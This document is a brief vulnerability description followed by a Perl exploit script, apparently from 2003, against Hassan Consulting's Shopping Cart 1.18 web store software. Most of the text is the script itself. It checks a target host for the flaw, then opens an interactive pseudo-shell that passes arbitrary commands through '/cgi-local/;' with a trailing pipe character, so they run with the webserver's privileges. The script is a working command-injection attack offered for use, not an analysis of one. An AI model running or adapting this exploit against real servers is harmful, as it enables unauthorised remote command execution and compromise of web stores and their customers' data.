source: Hassan Consulting's Shopping Cart is commercial web store software. Shopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a request which causes arbitrary commands to be executed on the host (with the privileges of the webserver process). For example, special shell characters like "|" or ";" are treated as valid by Shopping Cart. ##################################################### # Shopcart exploit # Spawn bash style Shell with webserver uid # # Spabam 2003 PRIV8 code # #hackarena # This Script is currently under development ##################################################### use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U[1] = "/cgi-local/;"; &intro; &scan; &choose; &command; &exit; sub intro { &help; &host; &server; sleep 3; }; sub host { print "\nHost or IP : "; $host=<STDIN>; chomp $host; if ($host eq ""){$host=""}; $shit="|"; $port="80"; chomp $port; if ($port =~/\D/ ){$port="80"}; if ($port eq "" ) {$port = "80"}; }; sub server { my $X; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; $probe = "string"; my $output; my $webserver = "something"; &connect; for ($X=0; $X<=10; $X++){ $output = $results[$X]; if (defined $output){ if ($output =~/Apache/){ $webserver = "Apache" }; }; }; if ($webserver ne "Apache"){ my $choice = "y"; chomp $choice; if ($choice =~/N/i) {&exit}; }else{ print "\n\nOK"; }; }; sub scan { my $status = "not_vulnerable"; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; my $loop; my $output; my $flag; $command="dir"; for ($loop=1; $loop < @U; $loop++) { $flag = "0"; $url = $U[$loop]; $probe = "scan"; &connect; foreach $output (@results){ if ($output =~ /Directory/) { $flag = "1"; $status = "vulnerable"; }; }; if ($flag eq "0") { }else{ }; }; if ($status eq "not_vulnerable"){ }; }; sub choose { my $choice="0"; chomp $choice; if ($choice > @U){ &choose }; if ($choice =~/\D/g ){ &choose }; if ($choice == 0){ &other }; $url = $U[$choice]; }; sub other { my $other = "/cgi-local/;"; chomp $other; $U[0] = $other; }; sub command { while ($command !~/quit/i) { print "\n[$host]\$ "; $command = <STDIN>; chomp $command; if ($command =~/quit/i) { &exit }; if ($command =~/url/i) { &choose }; if ($command =~/scan/i) { &scan }; if ($command =~/help/i) { &help }; $command =~ s/\s/+/g; $probe = "command"; if ($command !~/quit|url|scan|help/) {&connect}; }; &exit; }; sub connect { my $connection = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port", ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n"; $connection -> autoflush(1); if ($probe =~/command|scan/){ print $connection "GET $url$command$shit HTTP/1.0\r\n\r\n"; }elsif ($probe =~/string/) { print $connection "HEAD / HTTP/1.0\r\n\r\n"; }; while ( <$connection> ) { @results = <$connection>; }; close $connection; if ($probe eq "command"){ &output }; if ($probe eq "string"){ &output }; }; sub output{ my $display; if ($probe eq "string") { my $X; for ($X=0; $X<=10; $X++) { $display = $results[$X]; if (defined $display){print "$display";}; sleep 1; }; }else{ foreach $display (@results){ print "$display"; sleep 1; }; }; }; sub exit{ print "\n\n\n SPABAM 2003."; print "\n\n\n"; exit; }; sub help { print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\n v1.5 by SPABAM 2003"; print "\n "; print "\n Hassan Consulting's Shopping Cart Version 1.18 Exploit"; print "\n (this version is unstable. Require %20 instead space) note.. web directory is normally /var/www/html"; print "\n"; print "\n Host: or (RETURN for"; print "\n\n\n\n\n\n\n\n\n\n\n\n"; };